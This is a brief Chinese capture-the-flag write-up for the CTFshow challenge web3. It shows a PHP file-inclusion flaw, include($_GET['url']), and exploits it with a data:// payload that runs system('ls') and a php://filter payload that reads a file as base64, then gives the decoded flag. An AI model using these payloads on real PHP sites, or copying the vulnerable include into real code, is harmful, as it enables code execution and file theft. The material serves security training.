CTFshow WEB web3
-
进入环境,题目提示存在文件包含漏洞
<?php include($_GET['url']);?>
-
使用PHP伪协议
?url=data://text/plain,<?php% system('ls');?> ctf_go_go_go index.php
?url=php://filter/convert.base64-encode/resource=ctf_go_go_go Y3Rmc2hvd3swNjNmNWZkYS0wZmU3LTQxOWYtYWFmMi01ZDZkMjY1OGJiZTJ9Cg==
base64解密
ctfshow{063f5fda-0fe7-419f-aaf2-5d6d2658bbe2}